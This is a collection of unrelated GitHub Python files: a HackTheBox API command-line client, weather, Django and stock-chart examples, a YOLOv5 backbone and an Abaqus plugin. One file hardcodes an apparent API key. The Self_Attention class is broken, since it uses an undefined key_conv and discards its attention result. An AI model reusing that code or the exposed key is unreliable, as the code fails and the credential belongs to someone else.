extender_tiempo_maquina(maquina_htb):\n machine_id=conversor_id(maquina_htb)\n response=machines.extendMachine(machine_id, API)\n print(Fore.GREEN + \"\\n\\t[+] SUCCESS!\" +Fore.RESET)\n\n\n\n\ndef maquina():\n comandos_maquina()\n while True:\n try:\n comando=input(bcolors.UNDERLINE + \"boxthehack\" + bcolors.ENDC + \"/(MAQUINA)> \")\n comando=comando.lower()\n if(comando==\"help\"):\n comandos_maquina()\n elif(comando==\"back\"):\n break\n elif(comando==\"1\"):\n print(\"[+]Mostrando todas las máquinas...\")\n sleep(1)\n mostrar_todas_las_maquinas()\n elif(comando==\"2\"):\n print(\"[+]Mostrando todas las máquinas activas...\")\n sleep(1)\n mostrando_maquinas_activas()\n elif(comando==\"3\"):\n print(\"[+]Mostrando todas las máquinas retiradas...\")\n sleep(1)\n mostrando_maquinas_retiradas()\n elif(comando==\"4\"):\n print(Fore.GREEN + \"[!]\"+Fore.RESET+\" INSERTA FLAG\")\n sleep(0.5)\n nombre_maquina=input(Fore.YELLOW + \"\\n\\t[+]\"+ Fore.RESET + \"Inserta el nombre de la máquina>>\")\n inserta_flag(nombre_maquina)\n elif(comando==\"5\"):\n print(Fore.GREEN + \"[!]\"+Fore.RESET+\" RESETEA MAQUINA\")\n sleep(1)\n nombre_maquina=input(Fore.YELLOW + \"\\n\\t[+]\"+ Fore.RESET + \"Inserta el nombre de la máquina>>\")\n resetea_maquina(nombre_maquina)\n elif(comando==\"6\"):\n print(Fore.GREEN + \"[!]\"+Fore.RESET+\" ASIGNAR MAQUINA\")\n sleep(1)\n nombre_maquina=input(Fore.YELLOW + \"\\n\\t[+]\"+ Fore.RESET + \"Inserta el nombre de la máquina>>\")\n asignar_maquina(nombre_maquina)\n elif(comando==\"7\"):\n print(Fore.GREEN + \"[!]\"+Fore.RESET+\" EXTIENDE EL TIEMPO DE LA MAQUINA\")\n sleep(1)\n nombre_maquina=input(Fore.YELLOW + \"\\n\\t[+]\"+ Fore.RESET + \"Inserta el nombre de la máquina>>\")\n extender_tiempo_maquina(nombre_maquina)\n elif(comando==\"8\"):\n print(Fore.GREEN + \"[!]\"+Fore.RESET+\" PARAR MAQUINA\")\n sleep(1)\n nombre_maquina=input(Fore.YELLOW + \"\\n\\t[+]\"+ Fore.RESET + \"Inserta el nombre de la máquina>>\")\n parar_maquina(nombre_maquina)\n elif(comando==\"clear\"):\n os.system(\"clear\")\n print(banner)\n else:\n print(Fore.RED + \"[-] \" +Fore.RESET + \"Error, no existe el comando\")\n except Exception as e:\n print(\"Error: %s\"%(e))\n\ndef comandos_social():\n print(\"\"\"\n \"\"\"+ bcolors.HEADER +\"\\n\\t\\t[INFORMACIÓN]\" + bcolors.ENDC + \"\"\" \n \"\"\"+ bcolors.FAIL +\"[1]\"+bcolors.ENDC + \"\"\" Mostrar último mensaje de la ShoutBox. \n \"\"\"+ bcolors.FAIL +\"[2]\"+bcolors.ENDC + \"\"\" Mostrar todas tus conversaciones.\n \"\"\"+ bcolors.HEADER +\"\\n\\t\\t[INTERACCIÓN]\" + bcolors.ENDC + \"\"\" \n \"\"\"+ bcolors.FAIL +\"[3]\"+bcolors.ENDC + \"\"\" Enviar mensaje a la ShoutBox.\n \"\"\"+ bcolors.FAIL +\"[4]\"+bcolors.ENDC + \"\"\" Inicia conversación con un destinatario.\n \"\"\"+ bcolors.FAIL +\"[5]\"+bcolors.ENDC + \"\"\" Envía mensaje a una conversación ya iniciada.\n\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Back\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Clear \n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Help\n \"\"\")\n\ndef mostrar_ultimo_mensaje():\n try:\n response = rawPostSSL(f\"/shouts/get/initial/html/1\", \"\", API, \"\", \"}\").decode()\n if '\"success\":\"0\"' in response:\n return \"failed\"\n response = response[response.find('{\"success\":\"1\"'):]\n bs=BeautifulSoup(response, \"lxml\")\n ref=bs.find_all('a')\n span=bs.find_all('span')\n for r in ref:\n print(r.contents[0])\n \n for i in span:\n print(i.contents[0])\n\n\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef todas_conversaciones():\n try:\n response = rawPostSSL(\"/conversations/list/\", \"\", API, \"\", '\"}]').decode()\n response = response[response.find('[{\"id\":'):]\n jsondata = json.loads(response)\n for i in jsondata:\n print(Fore.YELLOW+\"\\n\\t\\t%s: %s -> %s\"%(i['id'],i['usernames'], i['lastmessage'])+Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef enviar_mensaje_shout():\n try:\n msg=input(\"\\n\\t[+] Escribe el mensaje que quieras enviar >>\")\n response = rawPostSSL(\"/shouts/new/\", f\"text={msg}\", API, \"x-www-form-urlencoded\", \"\")\n print(Fore.GREEN + \"[+] Mensaje enviado\" + Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef inicia_conversacion(destinatario):\n try:\n msg=input(\"\\n\\t[+] Escribe el mensaje que quieras enviar >>\")\n response = rawPostSSL(\"/conversations/new/\", f\"recipients%5B%5D={destinatario}&message={msg}\", API, \"x-www-form-urlencoded\", \"\")\n print(Fore.GREEN + \"[+] Mensaje enviado\" + Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef conversacion_iniciada():\n try:\n response = rawPostSSL(\"/conversations/list/\", \"\", API, \"\", '\"}]').decode()\n response = response[response.find('[{\"id\":'):]\n jsondata = json.loads(response)\n for i in jsondata:\n print(Fore.YELLOW+\"\\n\\t\\t%s: %s -> %s\"%(i['id'],i['usernames'], i['lastmessage'])+Fore.RESET)\n\n conversationid=int(input(\"\\n\\t[+]Ingresa el 'ID' del usuario>> \"))\n msg=input(\"\\n\\t[+] Escribe el mensaje que quieras enviar >>\")\n \n response = rawPostSSL(f\"/conversations/send/{conversationid}/\", f\"id={conversationid}&message={msg}\", API, \"x-www-form-urlencoded\", \"\")\n print(Fore.GREEN + \"[+] Mensaje enviado\" + Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\n\ndef social():\n comandos_social()\n while True:\n try:\n comando=input(bcolors.UNDERLINE + \"boxthehack\" + bcolors.ENDC + \"/(SOCIAL)> \")\n comando=comando.lower()\n if(comando==\"help\"):\n comandos_social()\n elif(comando==\"back\"):\n break\n elif(comando==\"1\"):\n print(\"[+] Mostrando ultimo mensaje..\")\n sleep(1.5)\n mostrar_ultimo_mensaje()\n elif(comando==\"2\"):\n print(\"[+] Mostrando todas las conversaciones..\")\n sleep(1.5)\n todas_conversaciones()\n elif(comando==\"3\"):\n enviar_mensaje_shout()\n elif(comando==\"4\"):\n destinatario=input(Fore.YELLOW + \"\\t[+]\"+ Fore.RESET + \" Introduce destinatario>>\")\n inicia_conversacion(destinatario)\n elif(comando==\"5\"):\n conversacion_iniciada()\n elif(comando==\"clear\"):\n os.system(\"clear\")\n print(banner)\n else:\n print(Fore.RED + \"[-] \" +Fore.RESET + \"Error, no existe el comando\")\n except Exception as e:\n print(\"Error: %s\"%(e))\n\n\ndef comandos_challenge():\n print(\"\"\"\n \"\"\"+ bcolors.FAIL +\"[1]\"+bcolors.ENDC + \"\"\" Flag del challenge [NO OPERATIVO]. \n\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Back\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Clear\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Help\n \"\"\")\n\ndef comprobar_flag(flag):\n try:\n #MODIFICAR\n #MODIFICAR\n #MODIFICAR\n response = rawPostSSL(\"/challenges/own/\", f'challenge_id={challengeid}&flag={flag}&difficulty={difficulty * 10}', API, \"x-www-form-urlencoded\", \"\")\n if '\"success\":\"1\"'.encode() in response:\n return \"success\"\n elif \"Incorrect flag\".encode() in response:\n return \"flag_invalid\"\n else:\n return \"failed\"\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef challenges():\n comandos_challenge()\n while True:\n try:\n comando=input(bcolors.UNDERLINE + \"boxthehack\" + bcolors.ENDC + \"/(CHALLENGES)> \")\n comando=comando.lower()\n if(comando==\"1\"):\n #flag=input(\"[+] Introduce la FLAG >>\")\n break\n elif(comando==\"back\"):\n break \n elif(comando==\"clear\"):\n os.system(\"clear\")\n print(banner)\n elif(comando==\"help\"):\n comandos_challenge()\n else:\n print(Fore.RED + \"[-] \" +Fore.RESET + \"Error, no existe el comando\")\n except Exception as e:\n print(\"Error: %s\"%(e))\n\n\n\nwhile True:\n comando=input(bcolors.UNDERLINE + \"boxthehack\" + bcolors.ENDC + \" > \")\n comando=comando.lower()\n try:\n if(comando==\"maquina\"):\n maquina()\n elif(comando==\"social\"):\n social()\n elif(comando==\"challenges\"):\n challenges()\n elif(comando==\"help\"):\n comandos_general()\n elif(comando==\"clear\"):\n os.system(\"clear\")\n print(banner)\n elif(comando==\"exit\"):\n sys.exit(1)\n else:\n print(Fore.RED + \"[-] \" +Fore.RESET + \"Error, no existe el comando\")\n except Exception as e:\n print(\"Error: %s\"%(e))\n","repo_name":"sergioab7/boxthehack","sub_path":"boxthehack.py","file_name":"boxthehack.py","file_ext":"py","file_size_in_byte":18285,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"31008271692","text":"import logging\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nfrom openweathermap_requests import OpenWeatherMapRequests\n\now = OpenWeatherMapRequests(api_key='f88e4f9c0329490d11901f8ff47777df', cache_name='cache-openweathermap', expire_after=5*60)\n\n# Historic weather by lat/lon\n\n(lon, lat) = (0.34189, 46.5798114) # Poitiers\n\ndata = ow.get_weather(lon=lon, lat=lat) # display current weather data\nprint(data)\n\n","repo_name":"Aluriak/24hducode2016","sub_path":"pocs/weather_python_lib_exemple.py","file_name":"weather_python_lib_exemple.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"19337354309","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom.models import BloodDoner \nfrom.serializers import BloodDonerSerializers\n\n# Create your views here.\n@api_view(['GET','POST'])\ndef blood_doner(request):\n if request.method == 'GET':\n doners = BloodDoner.objects.all().order_by('id')\n serializer=BloodDonerSerializers(doners,many=True)\n return Response(serializer.data)\n \n if request.method=='POST':\n serializer=BloodDonerSerializers(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response({'Success':\"Successfully created\"})\n\n@api_view(['GET','POST'])\ndef blood_doner_update(request,id):\n if request.method == 'GET':\n doners = BloodDoner.objects.get(id=id)\n serializer=BloodDonerSerializers(doners,many=False)\n return Response(serializer.data)\n \n if request.method=='POST':\n doners = BloodDoner.objects.get(id=id)\n serializer=BloodDonerSerializers(data=request.data,instance=doners)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response({'Success':\"Successfully Updated\"}) \n\n@api_view(['delete'])\ndef blood_doner_delete(request,id):\n \n doners = BloodDoner.objects.get(id=id)\n doners.delete()\n\n return Response({'Success':\"Successfully deleted\"}) \n\n# @api_view(['GET'])\n# def hello_world(request):\n# return Response({\"message\": \"Hello, world!\"})","repo_name":"KanxoDai/djangoProject","sub_path":"blog/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13136191460","text":"import torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass SiLU(nn.Module):\r\n @staticmethod\r\n def forward(x):\r\n return x * torch.sigmoid(x)\r\n\r\ndef autopad(k, p=None):\r\n if p is None:\r\n p = k // 2 if isinstance(k, int) else [x // 2 for x in k] \r\n return p\r\n\r\nclass Focus(nn.Module):\r\n def __init__(self, c1, c2, k=1, s=1, p=None, g=1, act=True): # ch_in, ch_out, kernel, stride, padding, groups\r\n super(Focus, self).__init__()\r\n self.conv = Conv(c1 * 4, c2, k, s, p, g, act)\r\n\r\n def forward(self, x):\r\n # 320, 320, 12 => 320, 320, 64\r\n return self.conv(\r\n # 640, 640, 3 => 320, 320, 12\r\n torch.cat(\r\n [\r\n x[..., ::2, ::2], \r\n x[..., 1::2, ::2], \r\n x[..., ::2, 1::2], \r\n x[..., 1::2, 1::2]\r\n ], 1\r\n )\r\n )\r\n\r\nclass Conv(nn.Module):\r\n def __init__(self, c1, c2, k=1, s=1, p=None, g=1, act=True):\r\n super(Conv, self).__init__()\r\n self.conv = nn.Conv2d(c1, c2, k, s, autopad(k, p), groups=g, bias=False)\r\n self.bn = nn.BatchNorm2d(c2, eps=0.001, momentum=0.03)\r\n self.act = SiLU() if act is True else (act if isinstance(act, nn.Module) else nn.Identity())\r\n\r\n def forward(self, x):\r\n return self.act(self.bn(self.conv(x)))\r\n\r\n def fuseforward(self, x):\r\n return self.act(self.conv(x))\r\n\r\nclass Bottleneck(nn.Module):\r\n # Standard bottleneck\r\n def __init__(self, c1, c2, shortcut=True, g=1, e=0.5): # ch_in, ch_out, shortcut, groups, expansion\r\n super(Bottleneck, self).__init__()\r\n c_ = int(c2 * e) # hidden channels\r\n self.cv1 = Conv(c1, c_, 1, 1)\r\n self.cv2 = Conv(c_, c2, 3, 1, g=g)\r\n self.add = shortcut and c1 == c2\r\n\r\n def forward(self, x):\r\n return x + self.cv2(self.cv1(x)) if self.add else self.cv2(self.cv1(x))\r\n\r\nclass C3(nn.Module):\r\n # CSP Bottleneck with 3 convolutions\r\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\r\n super(C3, self).__init__()\r\n c_ = int(c2 * e) # hidden channels\r\n self.cv1 = Conv(c1, c_, 1, 1)\r\n self.cv2 = Conv(c1, c_, 1, 1)\r\n self.cv3 = Conv(2 * c_, c2, 1) # act=FReLU(c2)\r\n self.m = nn.Sequential(*[Bottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n)])\r\n # self.m = nn.Sequential(*[CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n)])\r\n\r\n def forward(self, x):\r\n return self.cv3(torch.cat(\r\n (\r\n self.m(self.cv1(x)), \r\n self.cv2(x)\r\n )\r\n , dim=1))\r\n\r\nclass SPP(nn.Module):\r\n # Spatial pyramid pooling layer used in YOLOv3-SPP\r\n def __init__(self, c1, c2, k=(5, 9, 13)):\r\n super(SPP, self).__init__()\r\n c_ = c1 // 2 # hidden channels\r\n self.cv1 = Conv(c1, c_, 1, 1)\r\n self.cv2 = Conv(c_ * (len(k) + 1), c2, 1, 1)\r\n self.m = nn.ModuleList([nn.MaxPool2d(kernel_size=x, stride=1, padding=x // 2) for x in k])\r\n\r\n def forward(self, x):\r\n x = self.cv1(x)\r\n return self.cv2(torch.cat([x] + [m(x) for m in self.m], 1))\r\n \r\nclass CSPDarknet(nn.Module):\r\n def __init__(self, base_channels, base_depth, phi, pretrained):\r\n super().__init__()\r\n #-----------------------------------------------#\r\n # 输入图片是640, 640, 3\r\n # 初始的基本通道base_channels是64\r\n #-----------------------------------------------#\r\n\r\n #-----------------------------------------------#\r\n # 利用focus网络结构进行特征提取\r\n # 640, 640, 3 -> 320, 320, 12 -> 320, 320, 64\r\n #-----------------------------------------------#\r\n self.stem = Focus(3, base_channels, k=3)\r\n \r\n #-----------------------------------------------#\r\n # 完成卷积之后,320, 320, 64 -> 160, 160, 128\r\n # 完成CSPlayer之后,160, 160, 128 -> 160, 160, 128\r\n #-----------------------------------------------#\r\n self.dark2 = nn.Sequential(\r\n # 320, 320, 64 -> 160, 160, 128\r\n Conv(base_channels, base_channels * 2, 3, 2),\r\n # 160, 160, 128 -> 160, 160, 128\r\n C3(base_channels * 2, base_channels * 2, base_depth),\r\n )\r\n \r\n #-----------------------------------------------#\r\n # 完成卷积之后,160, 160, 128 -> 80, 80, 256\r\n # 完成CSPlayer之后,80, 80, 256 -> 80, 80, 256\r\n # 在这里引出有效特征层80, 80, 256\r\n # 进行加强特征提取网络FPN的构建\r\n #-----------------------------------------------#\r\n self.dark3 = nn.Sequential(\r\n Conv(base_channels * 2, base_channels * 4, 3, 2),\r\n C3(base_channels * 4, base_channels * 4, base_depth * 3),\r\n )\r\n\r\n #-----------------------------------------------#\r\n # 完成卷积之后,80, 80, 256 -> 40, 40, 512\r\n # 完成CSPlayer之后,40, 40, 512 -> 40, 40, 512\r\n # 在这里引出有效特征层40, 40, 512\r\n # 进行加强特征提取网络FPN的构建\r\n #-----------------------------------------------#\r\n self.dark4 = nn.Sequential(\r\n Conv(base_channels * 4, base_channels * 8, 3, 2),\r\n C3(base_channels * 8, base_channels * 8, base_depth * 3),\r\n )\r\n \r\n #-----------------------------------------------#\r\n # 完成卷积之后,40, 40, 512 -> 20, 20, 1024\r\n # 完成SPP之后,20, 20, 1024 -> 20, 20, 1024\r\n # 完成CSPlayer之后,20, 20, 1024 -> 20, 20, 1024\r\n #-----------------------------------------------#\r\n self.dark5 = nn.Sequential(\r\n Conv(base_channels * 8, base_channels * 16, 3, 2),\r\n SPP(base_channels * 16, base_channels * 16),\r\n C3(base_channels * 16, base_channels * 16, base_depth, shortcut=False),\r\n )\r\n if pretrained:\r\n url = {\r\n 's' : 'https://github.com/bubbliiiing/yolov5-pytorch/releases/download/v1.0/cspdarknet_s_backbone.pth',\r\n 'm' : 'https://github.com/bubbliiiing/yolov5-pytorch/releases/download/v1.0/cspdarknet_m_backbone.pth',\r\n 'l' : 'https://github.com/bubbliiiing/yolov5-pytorch/releases/download/v1.0/cspdarknet_l_backbone.pth',\r\n 'x' : 'https://github.com/bubbliiiing/yolov5-pytorch/releases/download/v1.0/cspdarknet_x_backbone.pth',\r\n }[phi]\r\n checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location=\"cpu\", model_dir=\"./model_data\")\r\n self.load_state_dict(checkpoint, strict=False)\r\n print(\"Load weights from \", url.split('/')[-1])\r\n \r\n def forward(self, x):\r\n x = self.stem(x)\r\n x = self.dark2(x)\r\n #-----------------------------------------------#\r\n # dark3的输出为80, 80, 256,是一个有效特征层\r\n #-----------------------------------------------#\r\n x = self.dark3(x)\r\n feat1 = x\r\n #-----------------------------------------------#\r\n # dark4的输出为40, 40, 512,是一个有效特征层\r\n #-----------------------------------------------#\r\n x = self.dark4(x)\r\n feat2 = x\r\n #-----------------------------------------------#\r\n # dark5的输出为20, 20, 1024,是一个有效特征层\r\n #-----------------------------------------------#\r\n x = self.dark5(x)\r\n feat3 = x\r\n return feat1, feat2, feat3\r\nclass ResnetBlock(nn.Module):\r\n\r\n def __init__(self, dim, padding_type, norm_layer, use_dropout, use_bias):\r\n super(ResnetBlock, self).__init__()\r\n self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias)\r\n self.self_attention=Self_Attention(dim,'relu')\r\n def build_conv_block(self, dim, padding_type, norm_layer, use_dropout, use_bias):\r\n conv_block = []\r\n p = 0\r\n if padding_type == 'reflect':\r\n conv_block += [nn.ReflectionPad2d(1)]\r\n elif padding_type == 'replicate':\r\n conv_block += [nn.ReplicationPad2d(1)]\r\n elif padding_type == 'zero':\r\n p = 1\r\n else:\r\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\r\n\r\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim), nn.ReLU(True)]\r\n if use_dropout:\r\n conv_block += [nn.Dropout(0.5)]\r\n\r\n p = 0\r\n if padding_type == 'reflect':\r\n conv_block += [nn.ReflectionPad2d(1)]\r\n elif padding_type == 'replicate':\r\n conv_block += [nn.ReplicationPad2d(1)]\r\n elif padding_type == 'zero':\r\n p = 1\r\n else:\r\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\r\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim)]\r\n\r\n return nn.Sequential(*conv_block)\r\n\r\n def forward(self, x):\r\n out = self.self_attention(x) + self.conv_block(x)+x\r\n return out\r\nclass Self_Attention(nn.Module):\r\n \"\"\" Self attention Layer\"\"\"\r\n\r\n def __init__(self, in_dim, activation):\r\n super(Self_Attention, self).__init__()\r\n self.chanel_in = in_dim\r\n self.activation = activation\r\n ## 下面的query_conv,key_conv,value_conv即对应Wg,Wf,Wh\r\n self.query_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim // 8, kernel_size=1) # 即得到C^ X C\r\n self.gamma = nn.Parameter(torch.zeros(1)) # 这里即是计算最终输出的时候的伽马值,初始化为0\r\n\r\n self.softmax = nn.Softmax(dim=-1)\r\n\r\n def forward(self, x):\r\n \"\"\"\r\n inputs :\r\n x : input feature maps( B X C X W X H)\r\n returns :\r\n out : self attention value + input feature\r\n attention: B X N X N (N is Width*Height)\r\n \"\"\"\r\n m_batchsize, C, width, height = x.size()\r\n ## 下面的proj_query,proj_key都是C^ X C X C X N= C^ X N\r\n proj_query = self.query_conv(x).view(m_batchsize, -1, width * height).permute(0, 2, 1) # B X CX(N),permute即为转置\r\n proj_key = self.key_conv(x).view(m_batchsize, -1, width * height) # B X C x (*W*H)\r\n energy = torch.bmm(proj_query, proj_key) # transpose check,进行点乘操作\r\n\r\n out = self.gamma + x\r\n return out","repo_name":"BosserWang/Yolov5_water","sub_path":"yolov5-pytorch-main-1/yolov5-pytorch-main/nets/CSPdarknet.py","file_name":"CSPdarknet.py","file_ext":"py","file_size_in_byte":10668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10613501459","text":"from verduleria_stock import datosFijos\n\n# ----- prog. principal ----------\nresultados = datosFijos() #carga de datos fijos\narticulos=resultados[0]\nprecios=resultados[1]\ncantidades={}\ntotal = 0\nformato_columna = '{0:<10} {1:<2}kg. :$ {2:<4} $ {3:<12}'\nprint(articulos,precios)","repo_name":"rodri9872/verduleria_python","sub_path":"verduleria_poo.py","file_name":"verduleria_poo.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"815119900","text":"'''\n#Please use the following example commands to specify the path containing code and data:\nimport os\nos.chdir('E:\\\\PythonBook_code_data\\\\part5\\\\28')\n'''\nimport pandas as pd\ntaiex2013=pd.read_csv('taiex2013.csv',sep='\\t')\ntaiex2013.head(n=3)\n\ntaiex2013.index = pd.to_datetime(taiex2013.Date)\ntype(taiex2013.index)\ntaiex201304 = taiex2013['2013-04'] \n\nfrom matplotlib.dates import date2num\nfrom datetime import datetime\n\ntaiex201304.Date=[date2num(datetime.strptime(date,\"%Y-%m-%d\"))\\\n for date in taiex201304.Date]\n \ntaiex201304.head()\ntype(taiex201304)\n\ntaiex201304_listData=[]\nfor i in range(len(taiex201304)):\n a=[taiex201304.Date[i],\\\n taiex201304.Open[i],taiex201304.High[i],\\\n taiex201304.Low[i],taiex201304.Close[i]]\n taiex201304_listData.append(a)\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import DateFormatter, WeekdayLocator,\\\n DayLocator, MONDAY\nfrom matplotlib.finance import candlestick_ohlc\n\nax= plt.subplot()\nmondays = WeekdayLocator(MONDAY)\nax.xaxis.set_major_locator(mondays)\nax.xaxis.set_minor_locator(DayLocator() )\nweekFormatter = DateFormatter('%y %b %d')\nax.xaxis.set_major_formatter(weekFormatter)\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\nax.set_title('加權股價指數2013年4月份K線圖')\ncandlestick_ohlc(ax, taiex201304_listData, \n width=0.7,colorup='r', colordown='g');\nplt.setp(plt.gca().get_xticklabels(),\n rotation=50,\n horizontalalignment='center')\nplt.show()\n\nfrom candle import candlePlot\n\ncandlePlot(taiex201304,title='加權股價指數2013年4月份K線圖')\n\n#morning star\ntaiex2011=pd.read_csv('taiex2011.csv',sep='\\t')\ntaiex2011.index=pd.to_datetime(taiex2011.Date,\n format='%Y-%m-%d')\n\ntaiex2011.head(2)\ntaiex2011.iloc[-2:,:]\n\nClose=taiex2011.Close\nOpen=taiex2011.Open\nClOp=Close-Open\nClOp.head()\nClOp.describe()\n\nShape = [0,0,0]\nfor i in range(3,len(ClOp)):\n if all([ClOp[i-2]<-20,abs(ClOp[i-1])< 20,\\\n ClOp[i]>5,abs(ClOp[i])>abs(ClOp[i-2]*0.5)]):\n Shape.append(1)\n else:\n Shape.append(0)\n\nShape.index(1)\n\n\nDoji=[0,0,0]\nfor i in range(3,len(Open)):\n if all([Open[i-1]Open13[i-1],\\\n Open13[i]>Close13[i-1],\\\n Close13[i]<0.5*(Close13[i-1]+Open13[i-1]),\\\n Close13[i]>Open13[i-1]]):\n Cloud[i]=1\n\n\nTrend=pd.Series(0,index=Close13.index)\nfor i in range(2,len(Close13)):\n if Close13[i-1]>Close13[i-2]>Close13[i-3]:\n Trend[i]=1\n\ndarkCloud=Cloud+Trend\ndarkCloud[darkCloud==2]\n\n\ntaiex201304=taiex2013['2013-04'] \ncandle.candlePlot(taiex201304 ,\\\n title='加權股價指數2013年4月份的日K線圖')\n\n\ntaiex201310=taiex2013['2013-10']\ncandle.candlePlot(taiex201310,\\\n title='加權股價指數2013年10月份的日K線圖')\n\n\n","repo_name":"weilly0912/Python-Quantitative-investing","sub_path":"part5/28/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"12550452186","text":"# -*- coding: utf-8 -*-\r\n#!/usr/bin/python3\r\n# propellant_v0125-1100 \r\n# Authorn:Jaime Lannister\r\n# Time:2019/2/28-11:49 \r\n\r\nfrom abaqusGui import *\r\nfrom abaqusConstants import ALL\r\nimport osutils, os\r\n\r\nclass Composite_plugin(AFXForm):\r\n\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n def __init__(self, owner):\r\n # Construct the base class.\r\n #\r\n AFXForm.__init__(self, owner)\r\n self.radioButtonGroups = {}\r\n\r\n self.cmd_composite = AFXGuiCommand(mode=self, method='orthotropic_mat',\r\n objectName='propellent_02_modules._01_platform_Part.Part_wcm_kernel',\r\n registerQuery=False)\r\n pickedDefault = ''\r\n\r\n # 定义专属复合材料的属性\r\n self.nameKw = AFXStringKeyword(self.cmd_composite, 'name', True, 'shell')\r\n\r\n # 密度\r\n self.desityKw = AFXFloatKeyword(self.cmd_composite, 'desity', True, 0.056)\r\n\r\n # 弹性模量\r\n self.elasticKw = AFXTableKeyword(self.cmd_composite, 'E_engineer_propellant', True)\r\n self.elasticKw.setColumnType(0, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(1, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(2, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(3, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(4, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(5, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(6, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(7, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(8, AFXTABLE_TYPE_FLOAT)\r\n\r\n # 热传导\r\n self.conductivityKw = AFXTableKeyword(self.cmd_composite, 'conductivity', True)\r\n self.conductivityKw.setColumnType(0, AFXTABLE_TYPE_FLOAT)\r\n self.conductivityKw.setColumnType(1, AFXTABLE_TYPE_FLOAT)\r\n\r\n # 热膨胀\r\n self.expansionKw = AFXTableKeyword(self.cmd_composite, 'expansion', True)\r\n self.expansionKw.setColumnType(0, AFXTABLE_TYPE_FLOAT)\r\n self.expansionKw.setColumnType(1, AFXTABLE_TYPE_FLOAT)\r\n\r\n # 比热容\r\n self.specificKw = AFXFloatKeyword(self.cmd_composite, 'specific', True, 0.1)\r\n\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n def getFirstDialog(self):\r\n\r\n import compositeDB\r\n return compositeDB.CompositeDB(self)\r\n\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n def doCustomChecks(self):\r\n\r\n # Try to set the appropriate radio button on. If the user did\r\n # not specify any buttons to be on, do nothing.\r\n #\r\n for kw1, kw2, d in self.radioButtonGroups.values():\r\n try:\r\n value = d[kw1.getValue()]\r\n kw2.setValue(value)\r\n except:\r\n pass\r\n return True\r\n\r\n def okToCancel(self):\r\n\r\n # No need to close the dialog when a file operation (such\r\n # as New or Open) or model change is executed.\r\n #\r\n return False\r\n\r\n def onCmdWarning(self, sender, sel, ptr):\r\n # print 'haha'\r\n if sender.getPressedButtonId() == \\\r\n AFXDialog.ID_CLICKED_YES:\r\n self.issueCommands()\r\n elif sender.getPressedButtonId() == \\\r\n AFXDialog.ID_CLICKED_NO:\r\n self.deactivate()\r\n\r\n\r\n # 